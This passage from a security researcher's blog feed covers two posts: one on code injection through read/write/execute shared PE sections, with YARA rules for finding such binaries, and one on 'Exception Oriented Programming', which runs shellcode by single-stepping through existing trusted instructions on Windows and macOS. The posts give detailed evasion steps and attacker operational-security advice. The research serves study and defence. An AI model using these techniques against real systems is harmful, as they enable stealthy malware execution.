<code>IMAGE_SCN_MEM_EXECUTE</code>, <code>IMAGE_SCN_MEM_READ</code>, and <code>IMAGE_SCN_MEM_WRITE</code>, which define whether a section should be executable, readable, and/or writable. 
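</p><p>As a quick illustration, these read/write/execute bits live in the 32-bit <code>Characteristics</code> field at offset 36 of each 40-byte section header. The following short Python sketch decodes them; the <code>.text</code> header below is fabricated, and the flag constants are the documented values from the PE specification:</p>

```python
import struct

# Documented section characteristic bits from the PE specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

def describe_section(header: bytes) -> str:
    """Decode the name and R/W/X bits of one 40-byte IMAGE_SECTION_HEADER."""
    name = header[:8].rstrip(b"\x00").decode("ascii", "replace")
    characteristics, = struct.unpack_from("<I", header, 36)
    perms = "".join(letter if characteristics & bit else "-"
                    for letter, bit in (("r", IMAGE_SCN_MEM_READ),
                                        ("w", IMAGE_SCN_MEM_WRITE),
                                        ("x", IMAGE_SCN_MEM_EXECUTE)))
    return name + ": " + perms

# A fabricated .text header: read + execute, with the layout fields zeroed.
text_header = b".text".ljust(8, b"\x00") + b"\x00" * 28 + struct.pack("<I", 0x60000020)
print(describe_section(text_header))  # .text: r-x
```

<p>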
However, these represent only a small fraction of the possible section characteristics.</p><p>When attempting to corrupt the PE section header, one specific flag caught my eye:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2022/04/image.png" class="kg-image" alt="Sharing is Caring: Abusing Shared Sections for Code Injection" loading="lazy" width="906" height="224" srcset="https://billdemirkapi.me/content/images/size/w600/2022/04/image.png 600w, https://billdemirkapi.me/content/images/2022/04/image.png 906w" sizes="(min-width: 720px) 720px"><figcaption>&quot;IMAGE_SCN_MEM_SHARED&quot; characteristic</figcaption></figure><p>According to Microsoft&apos;s documentation, the <code>IMAGE_SCN_MEM_SHARED</code> flag means that &quot;the section can be shared in memory&quot;. What does this mean in practice? There isn&apos;t much documentation on the use of this flag online, but it turns out that if this flag is enabled, that section&apos;s memory <strong>is shared across all processes that have the image loaded</strong>. For example, if processes A and B load a PE image with a section that is &quot;shared&quot; (and writable), any changes to the memory of that section in process A will be reflected in process B.</p><p>Some research relevant to the theory we will discuss in this article is <a href="https://code.google.com/archive/p/dll-shared-sections/downloads"><strong>DLL shared sections: a ghost of the past</strong></a> by <a href="https://twitter.com/gynvael">Gynvael Coldwind</a>. 
In his paper, Coldwind explored the potential vulnerabilities posed by binaries with PE sections that had the <code>IMAGE_SCN_MEM_SHARED</code> characteristic.</p><p>Coldwind explained that the risk posed by these PE images &quot;is an old and well-known security problem&quot;, referencing an article from Microsoft published in 2004 titled <em><a href="https://devblogs.microsoft.com/oldnewthing/20040804-00/?p=38253">Why shared sections are a security hole</a></em>. The paper focused only on the threat posed by &quot;Read/write shared sections&quot; and &quot;Read/only shared sections&quot; without addressing a third option, &quot;Read/write/<em><strong>execute </strong></em>shared sections&quot;.</p><h1 id="exploiting-shared-sections">Exploiting Shared Sections</h1><p>Although the general risk of shared sections has been known by researchers and Microsoft themselves for quite some time, there has not been significant investigation into the potential abuse of shared sections that are readable, writable, <em>and </em>executable (RWX-S).</p><p>There is great offensive potential for RWX-S binaries: if you can cause a remote process to load an RWX-S binary of your choice, you gain an executable memory page in the remote process that can be modified without being visible to kernel-based defensive solutions. 
To inject code, an attacker could load an RWX-S binary into their process, edit the section with whatever malicious code they want in memory, load the RWX-S binary into the remote process, and the changes in their own process would be reflected in the victim process as well.</p><p>The action of loading the RWX-S binary itself would still be visible to defensive solutions, but as we will discuss in a later section, there are plenty of options for legitimate RWX-S binaries that are used outside of a malicious context.</p><p>There are a few noteworthy comments about using this technique:</p><ol><li>An attacker must be able to load an RWX-S binary into the remote process. This binary does not need to contain any malicious code other than a PE section that is RWX-S.</li><li>If the RWX-S binary is x86, LoadLibrary calls inside of an x64 process will fail. x86 binaries can still be manually mapped inside x64 processes by opening the file, creating a section with the attribute <code>SEC_IMAGE</code>, and mapping a view of the section.</li><li>RWX-S binaries are not shared across sessions. RWX-S binaries <em>are </em>shared by unprivileged <strong>and </strong>privileged processes in the same session.</li><li>Modifications to shared sections are <em>not </em>written to disk. For example, the buffer returned by both ReadFile and mapping the image with the attribute <code>SEC_COMMIT</code> do not contain any modifications on the shared section. Only when the binary is mapped as <code>SEC_IMAGE</code> will these changes be present. This also means that any modifications to the shared section will not break the authenticode signature on disk.</li><li>Unless the used RWX-S binary has its entrypoint inside of the shared executable section, an attacker must be able to cause execution at an arbitrary address in the remote process. This does not require direct process access. 
For example, <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa">SetWindowsHookEx</a> could be used to execute an arbitrary pointer in a module without direct process access.</li></ol><p>In the next sections, we will cover practical implementations for this theory and the prevalence of RWX-S host binaries in the wild.</p><h1 id="patching-entrypoint-to-gain-execution">Patching Entrypoint to Gain Execution</h1><p>In certain cases, the requirement for an attacker to be able to execute an arbitrary pointer in the remote process can be bypassed.</p><p>If the RWX-S host binary has its entrypoint located <em>inside </em>of an RWX-S section, then an attacker does not need a special execution method.</p><p>Instead, before loading the RWX-S host binary into the remote process, an attacker can patch the memory located at the image&apos;s entrypoint to represent any arbitrary shellcode to be executed. When the victim process loads the RWX-S host binary and attempts to execute the entrypoint, the attacker&apos;s shellcode will be executed instead.</p><h1 id="finding-rwx-s-binaries-in-the-wild">Finding RWX-S Binaries In-the-Wild</h1><p>One of the questions that this research attempts to address is &quot;How widespread is the RWX-S threat?&quot;. For determining the prevalence of the technique, I used <a href="https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt">VirusTotal&apos;s Retrohunt</a> functionality which allows users to &quot;scan all the files sent to VirusTotal in the past 12 months with ... YARA rules&quot;.</p><p>For detecting <em>unsigned</em> RWX-S binaries in-the-wild, a custom YARA rule was created that checks for an RWX-S section in the PE image:</p><pre><code class="language-YARA">import &quot;pe&quot;

rule RWX_S_Search
{
	meta:
		description = &quot;Detects RWX-S binaries.&quot;
		author = &quot;Bill Demirkapi&quot;
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_SHARED) )
}</code></pre><p>All this rule does is enumerate a binary&apos;s PE sections and check whether any of them is readable, writable, executable, and shared.</p><p>When this rule was run through Retrohunt, over 10,000 unsigned binaries were found (Retrohunt stops searching beyond 10,000 results).</p><p>When the rule was run again with a slight modification to check that the PE image is for the <code>MACHINE_AMD64</code> machine type, there were only 99 x64 RWX-S binaries.</p><p>This suggests that RWX-S binaries for x64 machines have been relatively uncommon over the past 12 months and indicates that defensive solutions may be able to filter for RWX-S binaries without significant noise on protected machines.</p><p>In order to detect <em>signed </em>RWX-S binaries, the YARA rule above was slightly modified to contain a check for authenticode signatures.</p><pre><code class="language-YARA">import &quot;pe&quot;

rule RWX_S_Signed_Search
{
	meta:
		description = &quot;Detects RWX-S signed binaries. This only verifies that the image contains a signature, not that it is valid.&quot;
		author = &quot;Bill Demirkapi&quot;
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics &amp; pe.SECTION_MEM_SHARED) )
		and pe.number_of_signatures &gt; 0
}</code></pre><p>Unfortunately, with YARA rules there is not an easy way to determine whether a PE image contains an authenticode signature whose certificate is valid, unexpired, and accompanied by a timestamp from within the certificate&apos;s lifetime. This means the YARA rule above will produce some false positives from binaries with invalid signatures, so it did not immediately provide a list of RWX-S binaries with valid authenticode signatures. To extract signed binaries, a simple Python script was written that downloaded each sample below a detection threshold and verified the signature of each binary.</p><p>After this processing, approximately 15 unique binaries with valid authenticode signatures were found. As with unsigned binaries, <em>signed </em>RWX-S binaries have not been significantly common in the wild over the past 12 months. Additionally, only 5 of the 15 unique signed binaries are for x64 machines. While this number may seem low, signed binaries are only a convenience and are certainly not required in most situations.</p><h1 id="abusing-unsigned-rwx-s-binaries">Abusing Unsigned RWX-S Binaries</h1><h2 id="patching-unsigned-binaries">Patching Unsigned Binaries</h2><p>Given that mitigations such as <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/device-guard/introduction-to-device-guard-virtualization-based-security-and-windows-defender-application-control">User-Mode Code Integrity</a> have not experienced widespread adoption, patching existing unsigned binaries still remains a viable method.</p><p>To abuse RWX-S sections with unsigned binaries, an attacker could:</p><ol><li>Find a legitimate host unsigned DLL to patch.</li><li>Read the unsigned DLL into memory and patch a section&apos;s characteristics to be readable, writable, executable, and shared.</li><li>Write this new patched RWX-S host binary somewhere on disk before using 
it.</li></ol><p>Here are a few suggestions for maintaining operational security:</p><ol><li>It is recommended that an attacker does not patch an existing binary on disk. For example, if an attacker only modified the section characteristics of an existing binary and wrote this patch to the same path on disk, defensive solutions could detect that an RWX-S patch was applied to that existing file. Therefore, it is recommended that patched binaries be written to a different location on disk.</li><li>It is recommended that an attacker add other patches besides just RWX-S. This can be modifying other meaningless properties around the section&apos;s characteristics or modifying random parts of the code (it is important that these changes do not appear malicious). This is to make it harder to differentiate when an attacker has specifically applied an RWX-S patch on a binary.</li></ol><h2 id="using-existing-unsigned-binaries">Using Existing Unsigned Binaries</h2><p>Creating a custom patched binary is not required. For example, using the YARA rule in the previous section, an attacker could use any of the existing unsigned RWX-S binaries that may be used in legitimate applications.</p><h1 id="abusing-signed-rwx-s-binaries-in-the-kernel">Abusing Signed RWX-S Binaries in the Kernel</h1><p>Although there were only 15 signed RWX-S binaries discovered in the past 12 months, the fact that they have a valid authenticode signature can be useful during exploitation of processes that may require signed modules.</p><p>One interesting signed RWX-S binary that the search revealed was a signed driver. 
When attempting to test if shared sections are replicated from user-mode to kernel-mode, it was revealed that the memory is not shared, even when the image is mapped and modified by a process in Session 0.</p><h1 id="conclusion">Conclusion</h1><p>Although the rarity of shared sections presents a unique opportunity for defenders to obtain high-fidelity telemetry, RWX-S binaries still serve as a powerful method that break common assumptions regarding cross-process memory allocation and execution. The primary challenge for defenders around this technique is its prevalence in unsigned code. It may be relatively simple to detect RWX-S binaries, but how do you tell if it is used in a legitimate application?</p>]]></content:encoded></item><item><title><![CDATA[Abusing Exceptions for Code Execution, Part 1]]></title><description><![CDATA[<p>A common offensive technique used by operators and malware developers alike has been to execute malicious code at runtime to avoid static detection. Often, methods of achieving runtime execution have focused on placing arbitrary code into executable memory that can then be executed.</p><p>In this article, we will explore a</p>]]></description><link>https://billdemirkapi.me/exception-oriented-programming-abusing-exceptions-for-code-execution-part-1/</link><guid isPermaLink="false">61da2f5da39fe110b6ef5da9</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Mon, 14 Feb 2022 20:11:41 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2022/02/exception_oriented_programming_part1.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2022/02/exception_oriented_programming_part1.png" alt="Abusing Exceptions for Code Execution, Part 1"><p>A common offensive technique used by operators and malware developers alike has been to execute malicious code at runtime to avoid static detection. 
Often, methods of achieving runtime execution have focused on placing arbitrary code into executable memory that can then be executed.</p><p>In this article, we will explore a new approach to executing runtime code that does not rely on finding executable regions of memory, but instead relies on abusing existing trusted memory to execute arbitrary code.</p><h1 id="background">Background</h1><p>Some common methods of runtime execution include:</p><ol><li>Allocating executable memory at runtime.</li><li>Abusing Windows Section objects.</li><li>Abusing existing RWX (read/write/execute) regions of memory allocated by legitimate code.</li><li>Loading legitimate binaries that include an RWX PE section that can be overwritten.</li></ol><p>One common pattern in all these methods is that they have always had a heavy focus on placing arbitrary shellcode in executable regions of memory. Another technique that has not seen significant adoption in the malware community due to its technical complexity is Return-Oriented Programming (ROP).</p><p>As a brief summary, ROP is a common technique seen in memory corruption exploits where an attacker searches for &#x201C;snippets of code&#x201D; (gadgets) inside binaries that perform a desired instruction and soon after return to the caller. These &#x201C;gadgets&#x201D; can then be used in a chain to perform small operations that add up to a larger goal.</p><p>Although typically used for memory corruption exploits, there has been limited use in environments where attackers already have code execution. 
For example, in the Video Game Hacking industry, there have been <a href="https://github.com/Speedi13/ROP-COMPILER">open-source projects</a> that allow cheaters to abuse ROP gadgets to execute simplified shellcode for the purpose of gaining an unfair advantage in a video game.</p><p>The greatest limitation of ROP for runtime execution, however, is that the instruction set of potential gadgets can be extremely limited, which makes porting complex shellcode challenging.</p><p>As an attacker who already has execution in an environment, ROP is an inefficient method of performing arbitrary operations at runtime. For example, assume you are given the following assembly located in a legitimate binary:</p><pre><code class="language-assembly">imul eax, edx
add eax, edx
ret</code></pre><p>Using ROP, an attacker could only abuse the <code>add eax, edx</code> instruction because any previous instructions are not followed by a return instruction.</p><p>On a broader scale, although legitimate binaries are filled with a variety of different instructions performing all-kinds of operations, the limitations of ROP prevent an attacker from using most of these legitimate instructions.</p><p>Continuing the example assembly provided, the reason an attacker could not abuse the initial <code>imul eax, edx</code> instruction without corrupting their output is because as soon as the <code>imul</code> instruction is executed, the execution flow of the program would simply continue to the next <code>add eax, edx</code> instruction.</p><h1 id="theory-runtime-obfuscation">Theory: Runtime Obfuscation</h1><p>I propose a new method of abusing legitimate instructions already present in trusted code, <strong>Exception Oriented Programming</strong>. Exception Oriented Programming is the theory of chaining together instructions present in legitimate code and &#x201C;stepping over&#x201D; these instructions one-by-one using a single step exception to simulate the execution of arbitrary shellcode.</p><p>As a general method, the steps to performing Exception Oriented Programming given arbitrary shellcode are:</p><ol><li>Setup the environment such that the program can intercept single step exceptions.</li><li>Split each assembly instruction in the arbitrary shellcode into their respective assembled bytes.</li><li>For each instruction, find an instance of the assembled bytes present in any legitimate module and store the memory location of these legitimate instructions.</li><li>Execute any code that will cause an exception that the exception handler created in Step 1 can intercept. 
This can be as simple as performing a call instruction on an <code>int3</code> (0xCC) instruction.</li><li>In the exception handler, set the single step flag and set the instruction pointer register to the location of the next legitimate instruction for that shellcode.</li><li>Repeat Step 5 until all instructions of the shellcode are executed.</li></ol><p>The largest benefit to this method is that Exception Oriented Programming has significantly less requirements than Return Oriented Programming for an attacker that already has execution capabilities.</p><p>Next, we will cover some practical implementations of this theory. Although the implementations you will see are operating system specific, the theory itself is not restricted to one operating system. Additionally, implementation suggestions will stick strictly to documented methods, however it may be possible to implement the theory via undocumented methods such as directly hooking <code><a href="https://doar-e.github.io/blog/2013/10/12/having-a-look-at-the-windows-userkernel-exceptions-dispatcher">ntdll!KiUserExceptionDispatcher</a></code>.</p><h1 id="vectored-exception-handlers">Vectored Exception Handlers</h1><p>In this section, we will explore how to use <a href="https://docs.microsoft.com/en-us/windows/win32/debug/vectored-exception-handling">Vectored Exception Handlers</a> (VEH) to implement the EOP theory. Vectored Exception Handlers are an extension to Structured Exception Handling on Windows and are not frame-based. VEH will be called for unhandled exceptions regardless of the exception&apos;s location.</p><p>The flow for the preparation stage of this implementation is as follows:</p><ol><li>The application will register a VEH via the <code>AddVectoredExceptionHandler</code> Windows API.</li><li>The application will split each instruction of the given shellcode using any disassembler. 
For the example proof-of-concept, we will use the <a href="https://github.com/zyantific/zydis">Zydis disassembler library</a>.</li><li>For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. These memory locations will be stored for later use by the exception handler.</li><li>The application will finish preparing by finding any instance of an <code>int3</code> instruction (a single 0xCC byte). This instruction will be stored for use by the exception handler and is returned to the caller which will invoke the arbitrary shellcode.</li></ol><p>Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the <code>int3</code> instruction that was returned to them.</p><!--kg-card-begin: markdown--><ol>
<li>Once the caller has invoked the int3 instruction, the exception handler will be called with the code <code>STATUS_BREAKPOINT</code>. The exception handler should determine if this exception is for executing arbitrary shellcode by comparing the exception address with the previously stored location of the <code>int3</code> instruction.</li>
<li>If the breakpoint is indeed for the arbitrary shellcode, then the exception handler should:
<ol>
<li>Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.</li>
<li>Store these instructions in thread-local storage.</li>
<li>Set the instruction pointer to the first legitimate instruction to execute.</li>
<li>Set the <a href="https://en.wikipedia.org/wiki/Trap_flag">Trap flag</a> on the FLAGS register.</li>
<li>Continue execution.</li>
</ol>
</li>
<li>The rest of the instructions will cause a <code>STATUS_SINGLE_STEP</code> exception. In these cases, the exception handler should:
<ol>
<li>Retrieve the list of legitimate instructions to execute from the thread-local storage.</li>
<li>Set the instruction pointer to the next legitimate instruction&apos;s memory location.</li>
<li>If this instruction is <em>not</em> the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do <em>not</em> set the Trap flag.</li>
<li>Continue execution.</li>
</ol>
</li>
</ol>
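<p>The handler logic above consumes a list of legitimate instruction addresses produced during the preparation stage. That lookup step (finding each instruction&apos;s encoded bytes inside a loaded module) can be sketched in Python; the module bytes below are fabricated for illustration, and the encodings correspond to the earlier <code>imul eax, edx</code> / <code>add eax, edx</code> / <code>ret</code> example:</p>

```python
# Sketch of the gadget-lookup step. "module" stands in for the executable
# bytes of a legitimate loaded DLL; the per-instruction encodings are assumed
# to come from a disassembler such as Zydis splitting the shellcode.

def find_instruction_locations(instruction_encodings, module, module_base):
    """Return the virtual address of each instruction's bytes in the module."""
    locations = []
    for encoding in instruction_encodings:
        offset = module.find(encoding)
        if offset == -1:
            raise LookupError("no location found for " + encoding.hex())
        locations.append(module_base + offset)
    return locations

# Fabricated "module" containing imul eax, edx / add eax, edx / ret
# scattered between filler nops (0x90).
module = b"\x90\x90" + b"\x0f\xaf\xc2" + b"\x90" + b"\x01\xd0" + b"\xc3" + b"\x90"
shellcode = [b"\x0f\xaf\xc2", b"\x01\xd0", b"\xc3"]
print([hex(a) for a in find_instruction_locations(shellcode, module, 0x180000000)])
# ['0x180000002', '0x180000006', '0x180000008']
```

<p>At runtime, the exception handler would walk this list, pointing the instruction pointer at each stored address in turn while single stepping.</p>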
<!--kg-card-end: markdown--><p>Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller. A source code sample of Exception Oriented Programming through Vectored Exception Handlers is provided in a later section.</p><h1 id="structured-exception-handlers">Structured Exception Handlers</h1><p>Although Vectored Exception Handlers are great, they&apos;re not exactly stealthy. For example, an anti-virus could use user-mode hooks to detect when vectored exception handlers are registered. Obviously there are plenty of ways to bypass such mitigations, but if there are stealthier alternatives, why not give them a try?</p><p>One potential path I wanted to investigate for Exception Oriented Programming was using generic <a href="https://docs.microsoft.com/en-us/cpp/cpp/structured-exception-handling-c-cpp">Structured Exception Handling</a> (SEH). Given that VEH itself is an extension to SEH, why wouldn&apos;t frame-based SEH work too? Before we can dive into implementing Exception Oriented Programming with SEH, it&apos;s important to understand how SEH works.</p><pre><code class="language-C++">void my_bad_code() {
    __try {
        __debugbreak();
    } __except(EXCEPTION_EXECUTE_HANDLER) {
    	printf(&quot;Exception handler called!&quot;);
    }
}</code></pre><p>Let&apos;s say you surround some code with a try/except SEH block. When an exception occurs in that code, how does the application know what exception handler to invoke?</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2022/02/image.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 1" loading="lazy" width="586" height="412"><figcaption>Exception Directory of ntdll.dll</figcaption></figure><p>Nowadays SEH exception handling information is compiled into the binary, specifically the exception directory, detailing what regions of code are protected by an exception handler. When an exception occurs, this table is enumerated during an &quot;<a href="https://docs.microsoft.com/en-us/cpp/cpp/exceptions-and-stack-unwinding-in-cpp">unwinding process</a>&quot;, which checks if the code that caused the exception or any of the callers on the stack have an SEH exception handler.</p><p>An important principle of Exception Oriented Programming is that your exception handler must be able to catch exceptions in the legitimate code that is being abused. The problem with SEH? If a function is already protected by an SEH exception handler, then when an exception occurs, the exception may never reach the exception handler of the caller.</p><p>This presents a challenge for Exception Oriented Programming: how do you determine whether a given function is protected by an incompatible exception handler?</p><p>Fortunately, the mere presence of an exception handler does not mean a region of code cannot be used. Unless the function for some reason would create a single-step exception during normal operation or the function has a &quot;catch all&quot; handler, we can still use code from many functions protected by an exception handler.</p><p>To determine if a region of memory is compatible with Exception Oriented Programming:</p><!--kg-card-begin: markdown--><ol>
<li>Determine if the region of memory is registered as protected in the module&apos;s exception directory. This can be achieved by directly parsing the module or by using the function <a href="https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-rtllookupfunctionentry">RtlLookupFunctionEntry</a>, which searches for the exception directory entry for a given address.</li>
<li>If the region of memory is not protected by an exception handler (aka RtlLookupFunctionEntry returns NULL), then you can use this region of memory with no problem.</li>
<li>If the region of memory is protected by an exception handler, you must verify that the exception handler will not corrupt the stack. During the unwinding process, functions with an exception handler can define &quot;<a href="https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64#struct-unwind_code">unwind operations</a>&quot; to help clean up the stack from changes in the function&apos;s prolog. This can in turn corrupt the call stack when an exception is being handled.
<ol>
<li>To avoid this problem, check whether the unwind operations contain either the <a href="https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-170#:~:text=codes%20except%20UWOP_PUSH_MACHFRAME.-,UWOP_ALLOC_LARGE,-(1)%202%20or">UWOP_ALLOC_LARGE</a> operation or the <a href="https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-170#:~:text=to%204GB%20%2D%208.-,UWOP_ALLOC_SMALL,-(2)%201%20node">UWOP_ALLOC_SMALL</a> operation. These were found to cause direct corruption to the call stack during testing.</li>
</ol>
</li>
</ol>
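Check 3.1 above can be sketched by scanning a function's unwind codes directly. This is a hedged sketch: the `UnwindCode` struct and `IsRegionCompatible` helper are illustrative, though the operation codes and slot counts match Microsoft's documented x64 `UNWIND_CODE` layout. A real implementation would obtain the codes from the `UNWIND_INFO` referenced by the `RUNTIME_FUNCTION` entry that `RtlLookupFunctionEntry` returns.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// x64 unwind operation codes, per Microsoft's x64 exception handling docs.
constexpr uint8_t UWOP_PUSH_NONVOL     = 0;
constexpr uint8_t UWOP_ALLOC_LARGE     = 1;
constexpr uint8_t UWOP_ALLOC_SMALL     = 2;
constexpr uint8_t UWOP_SAVE_NONVOL     = 4;
constexpr uint8_t UWOP_SAVE_NONVOL_FAR = 5;
constexpr uint8_t UWOP_SAVE_XMM128     = 8;
constexpr uint8_t UWOP_SAVE_XMM128_FAR = 9;

// One UNWIND_CODE slot: the low 4 bits of `op_and_info` hold the operation,
// the high 4 bits hold OpInfo (mirrors the real UNWIND_CODE bitfield layout).
struct UnwindCode {
    uint8_t code_offset;
    uint8_t op_and_info;
};

// How many 16-bit slots an operation occupies (extra slots carry data).
static size_t SlotCount(uint8_t op, uint8_t op_info) {
    switch (op) {
        case UWOP_ALLOC_LARGE:     return op_info == 0 ? 2 : 3;
        case UWOP_SAVE_NONVOL:     return 2;
        case UWOP_SAVE_NONVOL_FAR: return 3;
        case UWOP_SAVE_XMM128:     return 2;
        case UWOP_SAVE_XMM128_FAR: return 3;
        default:                   return 1;
    }
}

// A protected region is usable only if its unwind codes contain no stack
// allocation operations, which were found to corrupt the call stack.
bool IsRegionCompatible(const std::vector<UnwindCode>& codes) {
    for (size_t i = 0; i < codes.size();) {
        uint8_t op = codes[i].op_and_info & 0x0F;
        uint8_t op_info = codes[i].op_and_info >> 4;
        if (op == UWOP_ALLOC_LARGE || op == UWOP_ALLOC_SMALL)
            return false;
        i += SlotCount(op, op_info); // skip data slots so they aren't misread as ops
    }
    return true;
}
```

Skipping the data slots matters: a multi-slot operation like `UWOP_SAVE_NONVOL` is followed by raw offset data that could coincidentally match an allocation opcode.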
<!--kg-card-end: markdown--><p>Once compatible instruction locations are found within legitimate modules, how do you actually perform the Exception Oriented Programming attack with SEH? It&apos;s surprisingly simple.</p><p>With SEH exception handling using a try/except block, you can define both an exception filter and the handler itself. When an exception occurs in the protected try/except block, the exception filter you define determines whether the exception should be passed to the handler itself. The filter is defined as a parameter to the __except block:</p><pre><code class="language-C++">void my_bad_code() {
    __try {
        __debugbreak();
    } __except(MyExceptionFilter()) {
    	printf(&quot;Exception handler called!&quot;);
    }
}</code></pre><p>In the example above, the exception filter is the function MyExceptionFilter and the handler is the code that simply prints that it was called. When registering a vectored exception handler, the handler function must be of the prototype <code>typedef LONG(NTAPI* ExceptionHandler_t)(PEXCEPTION_POINTERS ExceptionInfo)</code>.</p><p>It turns out that the prototype for exception filters is actually compatible with the prototype above. What does this mean? We can reuse the same exception handler we wrote for the VEH implementation of Exception Oriented Programming by using it as an exception filter.</p><pre><code>void my_bad_code() {
    __try {
        __debugbreak();
    } __except(VectoredExceptionHandler(GetExceptionInformation())) {
    	printf(&quot;Exception handler called!&quot;);
    }
}</code></pre><p>In the code above, the vectored exception handler is invoked using the <a href="https://docs.microsoft.com/en-us/windows/win32/debug/getexceptioninformation">GetExceptionInformation</a> macro, which provides the function the exception information structure it can both read and modify.</p><p>That&apos;s all that you need to do to get Exception Oriented Programming working with standard SEH! Besides ensuring that the instruction locations found are compatible, the vectored exception handler is directly compatible when used as an exception filter.</p><p>Why is standard SEH significantly better than using VEH for Exception Oriented Programming? SEH is built into the binary itself and is used legitimately <em>everywhere</em>. Unlike vectored exception handling, there is no global function to register your handler.</p><p>From the perspective of <em>static </em>detection, there are practically no indicators that a given SEH handler is used for Exception Oriented Programming. Although dynamic detection may be possible, it is significantly harder to implement compared to if you were using Vectored Exception Handlers.</p><h1 id="bypassing-the-macos-hardened-runtime">Bypassing the macOS Hardened Runtime</h1><p>Up to this point, the examples around abuse of the method have been largely around the Windows operating system. In this section, we will discuss how we can abuse Exception Oriented Programming to bypass security mitigations on macOS, specifically parts of the Hardened Runtime.</p><p>The <a href="https://developer.apple.com/documentation/security/hardened_runtime">macOS Hardened Runtime</a> is intended to provide &quot;runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering&quot;.</p><p>One security mitigation imposed by the Hardened Runtime is the restriction of just-in-time (JIT) compilation. 
For app developers, these restrictions can be bypassed by adding entitlements to disable certain protections.</p><p>The <code>com.apple.security.cs.allow-jit</code> entitlement allows an application to allocate writable/executable (WX) pages by using the <code>MAP_JIT</code> flag. A second alternative, the <code>com.apple.security.cs.allow-unsigned-executable-memory</code> entitlement, allows the application to allocate WX pages without the need of the <code>MAP_JIT</code> flag. With Exception Oriented Programming however, an attacker can execute just-in-time shellcode without needing any entitlements.</p><p>The flow for the preparation stage of this implementation is as follows:</p><ol><li>The application will register a <code>SIGTRAP</code> signal handler using <code><a href="https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/sigaction.2.html">sigaction</a></code> and the <code>SA_SIGINFO</code> flag.</li><li>The application will split each instruction of the given shellcode using any disassembler. For the example proof-of-concept, we will use the Zydis disassembler library.</li><li>For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. Executable memory regions can be recursively enumerated using the <a href="https://developer.apple.com/documentation/kernel/1402114-mach_vm_region_recurse"><code>mach_vm_region_recurse</code> function</a>. These memory locations will be stored for later use by the signal handler.</li><li>The application will finish preparing by finding any instance of an <code>int3</code> instruction (a single 0xCC byte). 
This instruction will be stored for use by the signal handler and is returned to the caller which will invoke the arbitrary shellcode.</li></ol><p>Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the <code>int3</code> instruction that was returned to them.</p><!--kg-card-begin: markdown--><ol>
<li>Once the caller has invoked the <code>int3</code> instruction, the signal handler will be called. The signal handler should determine if this exception is for executing arbitrary shellcode by comparing the fault address - 1 with the previously stored location of the <code>int3</code> instruction. One must be subtracted because, in the <code>SIGTRAP</code> signal handler, the fault address reflects the instruction pointer (which points past the trap), whereas we need the address of the instruction that caused the exception.</li>
<li>If the breakpoint is indeed for the arbitrary shellcode, then the signal handler should:
<ol>
<li>Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.</li>
<li>Store these instructions in thread-local storage.</li>
<li>Set the instruction pointer to the first legitimate instruction to execute.</li>
<li>Set the Trap flag on the FLAGS register.</li>
<li>Continue execution.</li>
</ol>
</li>
<li>The rest of the instructions will also invoke the signal handler; however, unlike Vectored Exception Handlers, no error code is passed to differentiate a breakpoint from a single-step exception. The signal handler can determine whether the exception is for a legitimate instruction being executed by checking its thread-local storage for the previously set context. In these cases, the signal handler should:
<ol>
<li>Retrieve the list of legitimate instructions to execute from the thread-local storage.</li>
<li>Set the instruction pointer to the next legitimate instruction&apos;s memory location.</li>
<li>If this instruction is <em>not</em> the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do <em>not</em> set the Trap flag.</li>
<li>Continue execution.</li>
</ol>
</li>
</ol>
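Step 1 of the preparation flow can be shown with a minimal, compilable sketch of the handler registration. This is a sketch under stated assumptions: `TrapHandler` and `InstallTrapHandler` are illustrative names, and the instruction-pointer and trap-flag manipulation described in the steps above is omitted because it goes through the platform-specific `ucontext_t` layout, which differs between macOS and Linux.

```cpp
#include <signal.h>

// Counts SIGTRAP deliveries; sig_atomic_t is safe to touch from a handler.
static volatile sig_atomic_t g_trap_count = 0;

// SA_SIGINFO-style handler: receives a siginfo_t with the fault address.
// A real handler would compare info->si_addr - 1 against the stored int3
// location, then rewrite the instruction pointer and trap flag through the
// ucontext_t argument, as described in the numbered steps above.
static void TrapHandler(int sig, siginfo_t* info, void* ucontext) {
    (void)info;
    (void)ucontext;
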